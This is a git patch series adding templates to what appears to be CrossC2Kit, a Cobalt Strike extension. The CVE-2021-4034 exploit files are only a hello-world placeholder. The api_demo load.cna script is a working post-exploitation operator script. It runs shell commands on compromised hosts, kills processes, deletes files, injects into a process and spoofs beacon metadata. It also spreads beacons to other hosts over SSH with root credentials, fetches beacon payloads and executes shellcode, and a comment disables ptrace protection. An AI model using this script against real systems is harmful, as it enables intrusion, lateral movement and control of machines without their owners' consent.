From 3fd511eb3630975752bfdd44bb2586db14c0fbcb Mon Sep 17 00:00:00 2001 From: gloxec Date: Mon, 6 Jun 2022 17:37:46 +0800 Subject: [PATCH 1/3] demo template --- third-party/lpe/CVE-2021-4034/load.cna | 3 ++ third-party/lpe/CVE-2021-4034/readme.md | 9 +++++ third-party/lpe/CVE-2021-4034/src/exp.c | 6 ++++ third-party/lpe/CVE-2021-4034/src/makefile | 38 +++++++++++++++++++++ third-party/utils/library_demo/load.cna | 3 ++ third-party/utils/library_demo/readme.md | 10 ++++++ third-party/utils/library_demo/src/makefile | 38 +++++++++++++++++++++ third-party/utils/library_demo/src/test1.c | 5 +++ 8 files changed, 112 insertions(+) create mode 100644 third-party/lpe/CVE-2021-4034/load.cna create mode 100755 third-party/lpe/CVE-2021-4034/readme.md create mode 100755 third-party/lpe/CVE-2021-4034/src/exp.c create mode 100644 third-party/lpe/CVE-2021-4034/src/makefile create mode 100644 third-party/utils/library_demo/load.cna create mode 100755 third-party/utils/library_demo/readme.md create mode 100755 third-party/utils/library_demo/src/makefile create mode 100755 third-party/utils/library_demo/src/test1.c diff --git a/third-party/lpe/CVE-2021-4034/load.cna b/third-party/lpe/CVE-2021-4034/load.cna new file mode 100644 index 0000000..6cb3e01 --- /dev/null +++ b/third-party/lpe/CVE-2021-4034/load.cna @@ -0,0 +1,3 @@ +println("cve-2021-4034/load.cna"); +println("use exp.linux"); +println("use exp.mac"); \ No newline at end of file diff --git a/third-party/lpe/CVE-2021-4034/readme.md b/third-party/lpe/CVE-2021-4034/readme.md new file mode 100755 index 0000000..4d19b6d --- /dev/null +++ b/third-party/lpe/CVE-2021-4034/readme.md @@ -0,0 +1,9 @@ +# CVE-2021-4034 polkit pkexec LPE + +# this module support MacOS & Linux + +# 编译 ELF & MachO 可执行文件 demo + +cve-2021-4034 -> + exp.linux + exp.mac \ No newline at end of file diff --git a/third-party/lpe/CVE-2021-4034/src/exp.c b/third-party/lpe/CVE-2021-4034/src/exp.c new file mode 100755 index 0000000..3c690d4 --- /dev/null +++ b/third-party/lpe/CVE-2021-4034/src/exp.c @@ -0,0 +1,6 @@ +#include + +int main(int argc, char **argv) { + printf("hello, this is CVE-2021-4034 demo"); + return 0; +} \ No newline at end of file diff --git a/third-party/lpe/CVE-2021-4034/src/makefile b/third-party/lpe/CVE-2021-4034/src/makefile new file mode 100644 index 0000000..a75acad --- /dev/null +++ b/third-party/lpe/CVE-2021-4034/src/makefile @@ -0,0 +1,38 @@ +TARGET_Linux = exp.linux +TARGET_Mac = exp.mac +TARGET_shared = false + +ifeq ($(OS),Windows_NT) + ARCH := Windows +else + ARCH := $(shell uname -s) +endif + +ifeq ($(ARCH), Linux) + target = $(TARGET_Linux) + readSymbol = strings $(target) | grep GLIBC +endif +ifeq ($(ARCH), Darwin) + target = $(TARGET_Mac) +endif + +ifeq ($(TARGET_shared), true) + CC_CFLAGS = -shared +else + CC_CFLAGS = +endif + +all: $(target) + @echo "----------------- nm ---------------------" + nm $(target) + @echo "------------------------------------------" + @echo "---------------- GLIBC -------------------" + $(readSymbol) + @echo "------------------------------------------" + cp $(target) ../ + +$(target): exp.o + gcc $^ $(CC_CFLAGS) -o $@ + +clean: + rm $(target) *.o \ No newline at end of file diff --git a/third-party/utils/library_demo/load.cna b/third-party/utils/library_demo/load.cna new file mode 100644 index 0000000..59f86a6 --- /dev/null +++ b/third-party/utils/library_demo/load.cna @@ -0,0 +1,3 @@ +println("library_demo/load.cna"); +println("use libtest1.linux"); +println("use libtest1.mac"); \ No newline at end of file diff --git a/third-party/utils/library_demo/readme.md b/third-party/utils/library_demo/readme.md new file mode 100755 index 0000000..c90695a --- /dev/null +++ b/third-party/utils/library_demo/readme.md @@ -0,0 +1,10 @@ +# CVE-2021-4034 polkit pkexec LPE + +# this module support MacOS & Linux + +# 编译 Linux & MacOS 动态库文件 demo + + +demo_a.txt -> + libtest1.linux + libtest1.mac \ No newline at end of file diff --git a/third-party/utils/library_demo/src/makefile b/third-party/utils/library_demo/src/makefile new file mode 100755 index 0000000..221c3b9 --- /dev/null +++ b/third-party/utils/library_demo/src/makefile @@ -0,0 +1,38 @@ +TARGET_Linux = libtest1.linux +TARGET_Mac = libtest1.mac +TARGET_shared = true + +ifeq ($(OS),Windows_NT) + ARCH := Windows +else + ARCH := $(shell uname -s) +endif + +ifeq ($(ARCH), Linux) + target = $(TARGET_Linux) + readSymbol = strings $(target) | grep GLIBC +endif +ifeq ($(ARCH), Darwin) + target = $(TARGET_Mac) +endif + +ifeq ($(TARGET_shared), true) + CC_CFLAGS = -shared +else + CC_CFLAGS = +endif + +all: $(target) + @echo "----------------- nm ---------------------" + nm $(target) + @echo "------------------------------------------" + @echo "---------------- GLIBC -------------------" + $(readSymbol) + @echo "------------------------------------------" + cp $(target) ../ + +$(target): test1.o + gcc $^ $(CC_CFLAGS) -o $@ + +clean: + rm $(target) *.o \ No newline at end of file diff --git a/third-party/utils/library_demo/src/test1.c b/third-party/utils/library_demo/src/test1.c new file mode 100755 index 0000000..10063c8 --- /dev/null +++ b/third-party/utils/library_demo/src/test1.c @@ -0,0 +1,5 @@ +#include + +void func1(int argc, char **argv) { + printf("hello, this is library demo\n"); +} \ No newline at end of file From 2cd5a74dc05b4d6384ec5610f374ae199d5bc841 Mon Sep 17 00:00:00 2001 From: gloxec Date: Mon, 6 Jun 2022 17:48:39 +0800 Subject: [PATCH 2/3] CrossC2Kit API demo --- third-party/api_demo/load.cna | 86 +++++++++++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 third-party/api_demo/load.cna diff --git a/third-party/api_demo/load.cna b/third-party/api_demo/load.cna new file mode 100644 index 0000000..f861a69 --- /dev/null +++ b/third-party/api_demo/load.cna @@ -0,0 +1,86 @@ + +println("---------- third party ----------------"); + +sub callback_ls{ + # $1 = beacon ID, $2 = the folder, $3 = results + $bid = $1; + $pwd = $2; + $res = $3; + + blog($bid, @($pwd, $res)); +} + +sub callback_ps { + $bid = $1; + $res = $2; + + blog($bid, @($res)); +} + +foreach $beacon (beacons()) { + if (!-isactive $beacon['id']) { + } else if (-isssh $beacon['id']) { + $bid = $beacon['id']; + blog($bid, "auto api test demo"); # 记录日志 + + bshell($bid, "echo \$AAA"); # 命令执行 + bcc2_setenv($bid, "AAA", "ccc"); # 设置环境变量 + bshell($bid, "echo \$AAA"); + + bcc2_unsetenv($bid, "AAA"); # 删除环境变量 + bshell($bid, "echo \$AAA"); + + bsleep($bid, 2); # 设置休眠时间 + + btask($bid, "list dir"); # 记录执行任务 + bls($bid, "./", &callback_ls); # 获取执行目录下的文件列表信息, 支持回调 + + btask($bid, "list process"); + bps($bid, &callback_ps); # 获取进程信息, 支持回调 + + bpwd($bid); # <---------- teamserver ignore + bmkdir($bid, "/tmp/1234"); # 创建目录 + bcd($bid, "/tmp/1234"); # 切换工作目录 + bpwd($bid); # 获取工作目录 + + bkill($bid, 123); # 结束指定PID进程 + brm($bid, "/tmp/1234/aaa"); # 删除文件 / 文件夹 + # brm($bid, "/tmp/1234/bbb"); + + bsetostype($bid, "printer"); # 修改 beacon 元数据中的操作系统类型 + bsetlocalip($bid, "10.0.0.1"); # 修改 beacon 元数据中的内网IP + bsethostname($bid, "test_hostname"); # 修改 beacon 元数据中的主机名称 + + # bcc2_inject($bid, $pid, $fileData, $temp_file_workpath); + # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope"); + bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/"); # 向指定PID进程注入指定内容 + + # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace); + bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/"); # 向目标主机列表通过 SSH 协议,上线指定listener的beacon + + $res = getSSHSession(); # 获取活跃状态的 CrossC2 会话 + blog($bid, $res); + + $res = getCrossC2Site(); # 获取服务端 CrossC2 beacon的下载地址 + blog($bid, $res); + + $res = getCrossC2Listener(); # 获取服务端配置的 CrossC2 监听器信息 + blog($bid, $res); + + $libbeacon = getCrossC2Beacon("test_demo_cc2_listener", "lib"); # 从服务端指定 CrossC2 监听器中获取动态库类型 beacon + $beacon = getCrossC2Beacon("test_demo_cc2_listener", "main"); # 从服务端指定 CrossC2 监听器中获取可执行文件类型 beacon + $len_libbeacon = size($libbeacon); + $len_beacon = size($beacon); + blog($bid, "libbeacon size: $len_libbeacon"); + blog($bid, "beacon size: $len_beacon"); + + + bcc2_unsetenv($bid, "AAA") + bshell($bid, "export"); + + + # run shellcode + bshellcode($bid, "\\x90\\x90\\x90\\x90"); # 指定会话中执行 shellcode + + } +} \ No newline at end of file From e5bcf1a60a829c80bf7cc139841c6ccac968a43b Mon Sep 17 00:00:00 2001 From: gloxec Date: Mon, 6 Jun 2022 17:57:30 +0800 Subject: [PATCH 3/3] Update exp.c --- third-party/lpe/CVE-2021-4034/src/exp.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/third-party/lpe/CVE-2021-4034/src/exp.c b/third-party/lpe/CVE-2021-4034/src/exp.c index 3c690d4..6629a15 100755 --- a/third-party/lpe/CVE-2021-4034/src/exp.c +++ b/third-party/lpe/CVE-2021-4034/src/exp.c @@ -1,6 +1,6 @@ #include int main(int argc, char **argv) { - printf("hello, this is CVE-2021-4034 demo"); + printf("hello, this is CVE-2021-4034 demo."); return 0; } \ No newline at end of file